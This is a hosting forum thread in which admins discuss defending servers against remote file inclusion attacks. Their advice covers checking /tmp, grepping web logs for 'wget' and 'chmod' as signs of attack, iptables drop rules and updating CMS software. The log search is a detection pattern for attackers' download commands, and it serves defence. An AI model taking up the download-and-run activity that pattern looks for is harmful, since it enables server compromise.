What to do about hacked machines

[stuartmcdonald]

My server is currently being attacked from a couple of already compormised servers via some kind of script that tries to upload files via a file injection bug. mod_security denies it access.

I got the file concerned (it's a txt file) from one of the compromised servers and it includes the gmail account of the twit who is attacking me.

Aside from sending him an email suggesting he go and do something slightly more productive with his life, and emailing the contacts for the compromised servers, is there anything else I could/should be doing?

 

[BlueZebra]

Many of the forums and CMS softwares, if not updated properly can be the cause of many vulnerabilities like remote file inclusion or mysql injections.
You can check your /tmp directory to find if there are any executables or text files. Run /scripts/securetmp to securing the /tmp directory.
You may also search the domlogs to find the commands like wget, chmod, chown etc. to find the vulnerable files.
#cd /usr/local/apache/domlogs/
#grep -rl wget *
If you doubt that the machine is rooted, there is no other way than reloading the box.

 

[jerrybell]

These attacks are very pervasive right now. About the best you can do is complain to google and get his gmail account suspended, and advise the ISPs/hosts of the code that they've most likely been hacked.

I did that for a while, but it became too much of a hassle. The attacks aren't effective abd there's no way to firewall them, since they come from many different IPs. My emails to domain owners were either ignored or accused me of wanting to hack them/steal their identity or site content.

I have been collecting the scripts as I find new ones. I've been thinking about setting up a "blacklist" of IP's that could be null routed or firewalled. But then, I'd be in for the same kinds of fun that the email RBL's have experienced.

 

[JBenedetti]

Where are these attacks coming from? Do you have IPs? Sometimes you can report them to their ISP and the ISP will kick them out-- that just delays them a bit. I don't know if this is really the accepted method or not, but I usually grab the attacker's IP and add it to /etc/sysconfig/iptables:

:INPUT ACCEPT [580:46045]
-A INPUT --source hacker.ip.here -j DROP
-A INPUT --source another.bad.ip.here -j DROP
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [715:746538]
COMMIT

Doing this will drop all connections coming from the offending IP. The list can get pretty long, and I've been told it will slow your system if it gets too long... but so far it's been working for me. A determined hacker will hit you from a new IP... but many times they just move on to someone else. Most of these guys are just looking for a script they can compromise so they can upload a mail form and use it so sell some dick pills... so once they run into some complications they'll move on.

I've also found that mod_security keeps out a lot of problems. So just keep your ruleset up-to-date, keep cPanel up-to-date and make sure any opensource php or cgi scripts on your system are maintained (tall order there, sometimes), especially those that allow posting of comments or file uploads. My past problems have all resulted from some common software being left out-of-date. Hacked scripts for me personally have been Nucleus CMS, PHPBB and Joomla. I also see people constantly probing for phpMyChat and phpAdsNew installations. Basically I try to stick to well-maintained scripts and then quickly apply all security updates released by the developers. From there, it's really just more of an annoyance watching these guys try to get in. Pretty aggravating for the small guys like us.